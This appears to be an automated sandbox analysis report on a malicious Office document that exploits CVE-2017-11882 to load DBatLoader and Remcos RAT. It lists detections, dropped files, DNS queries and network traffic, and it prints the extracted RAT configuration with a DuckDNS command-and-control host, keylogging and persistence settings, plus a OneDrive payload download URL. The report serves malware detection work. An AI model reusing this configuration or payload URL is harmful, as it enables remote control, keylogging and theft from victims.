Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Found malware configuration

Source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "wwsaer.duckdns.org:8533:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9VASLD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: 8.0.csrss.exe.400000.0.unpack	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\csrss.exe	ReversingLabs: Detection: 21%
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	ReversingLabs: Detection: 21%

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\notes\logs.dat, type: DROPPED

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D73837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		8_2_33D73837
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_2D253837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		11_2_2D253837

Source: csrss.exe, 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_126a8c25-0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: unknown Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\csrss.exe

Jump to behavior

Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.dr	Stream path '_1777979214/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.dr	Stream path '_1777979220/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.dr	Stream path '_1777979241/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.dr	Stream path '_1777979242/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.dr	Stream path '_1777979244/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown

HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D8E879 FindFirstFileExA,	8_2_33D8E879
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	8_2_33D4C34D
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_33D4BB30
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D59AF5 FindFirstFileW,	8_2_33D59AF5
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	8_2_33D5C291
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4880C FindFirstFileW,FindNextFileW,FindClose,	8_2_33D4880C
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4783C FindFirstFileW,FindNextFileW,	8_2_33D4783C
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D49665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_33D49665
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_33D4BD37
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C758B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	11_2_02C758B4

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Source: global traffic	DNS query: name: qr-in.com
Source: global traffic	DNS query: name: qr-in.com
Source: global traffic	DNS query: name: qr-in.com
Source: global traffic	DNS query: name: qr-in.com
Source: global traffic	DNS query: name: qr-in.com
Source: global traffic	DNS query: name: qr-in.com
Source: global traffic	DNS query: name: onedrive.live.com
Source: global traffic	DNS query: name: onedrive.live.com
Source: global traffic	DNS query: name: onedrive.live.com
Source: global traffic	DNS query: name: f3rtrw.bl.files.1drv.com
Source: global traffic	DNS query: name: f3rtrw.bl.files.1drv.com
Source: global traffic	DNS query: name: wwsaer.duckdns.org
Source: global traffic	DNS query: name: geoplugin.net

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
